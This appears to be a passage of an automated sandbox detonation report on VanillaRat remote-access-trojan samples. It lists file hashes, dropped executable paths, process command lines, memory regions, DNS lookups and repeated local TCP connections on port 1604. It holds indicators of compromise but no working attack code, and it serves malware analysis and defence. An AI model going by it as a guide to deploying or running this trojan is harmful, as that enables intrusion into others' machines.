| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
memory/228-51-0x00007FFE8A4A0000-0x00007FFE8A4B9000-memory.dmp
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Windows\$sxr-powershell.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
Analysis: behavioral3
Detonation Overview
Submitted
2023-10-11 20:13
Reported
2023-10-12 14:19
Platform
win7-20230831-en
Max time kernel
119s
Max time network
123s
Command Line
Signatures
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe"
Network
Files
memory/2252-0-0x0000000000850000-0x0000000000A18000-memory.dmp
memory/2252-1-0x0000000074000000-0x00000000746EE000-memory.dmp
memory/2252-2-0x0000000004CE0000-0x0000000004D20000-memory.dmp
memory/2252-3-0x0000000005000000-0x00000000050E0000-memory.dmp
memory/2252-4-0x0000000004CE0000-0x0000000004D20000-memory.dmp
memory/2252-5-0x0000000074000000-0x00000000746EE000-memory.dmp
memory/2252-6-0x0000000004CE0000-0x0000000004D20000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2023-10-11 20:13
Reported
2023-10-12 14:19
Platform
win10v2004-20230915-en
Max time kernel
144s
Max time network
153s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaRat.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.120.234.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.173.189.20.in-addr.arpa | udp |
Files
memory/556-0-0x0000000075220000-0x00000000759D0000-memory.dmp
memory/556-1-0x00000000007C0000-0x0000000000988000-memory.dmp
memory/556-2-0x0000000005A10000-0x0000000005FB4000-memory.dmp
memory/556-3-0x0000000005390000-0x0000000005422000-memory.dmp
memory/556-4-0x00000000052E0000-0x00000000052F0000-memory.dmp
memory/556-5-0x0000000005460000-0x000000000546A000-memory.dmp
memory/556-6-0x0000000006DA0000-0x0000000006E80000-memory.dmp
memory/556-7-0x0000000007030000-0x00000000071D6000-memory.dmp
memory/556-8-0x0000000075220000-0x00000000759D0000-memory.dmp
memory/556-9-0x00000000052E0000-0x00000000052F0000-memory.dmp
memory/556-10-0x00000000052E0000-0x00000000052F0000-memory.dmp
memory/556-11-0x00000000052E0000-0x00000000052F0000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2023-10-11 20:13
Reported
2023-10-12 14:18
Platform
win7-20230831-en
Max time kernel
151s
Max time network
124s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaStub.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaStub.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp |
Files
memory/2828-1-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmp
memory/2828-0-0x0000000000CF0000-0x0000000000D12000-memory.dmp
memory/2828-2-0x0000000000440000-0x00000000004C0000-memory.dmp
memory/2828-3-0x000007FEF5BD0000-0x000007FEF65BC000-memory.dmp
memory/2828-4-0x0000000000440000-0x00000000004C0000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2023-10-11 20:13
Reported
2023-10-12 14:18
Platform
win10v2004-20230915-en
Max time kernel
151s
Max time network
155s
Command Line
Signatures
VanillaRat
Vanilla Rat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaStub.exe
"C:\Users\Admin\AppData\Local\Temp\VanillaRat\Main\VanillaStub.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 38.148.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 254.21.238.8.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp | |
| N/A | 127.0.0.1:1604 | tcp |
Files
memory/4652-0-0x0000017A0D490000-0x0000017A0D4B2000-memory.dmp
memory/4652-1-0x00007FFD21100000-0x00007FFD21BC1000-memory.dmp
memory/4652-2-0x0000017A27A40000-0x0000017A27A50000-memory.dmp
memory/4652-3-0x0000017A27B60000-0x0000017A27D09000-memory.dmp
memory/4652-4-0x00007FFD21100000-0x00007FFD21BC1000-memory.dmp
memory/4652-6-0x0000017A27A40000-0x0000017A27A50000-memory.dmp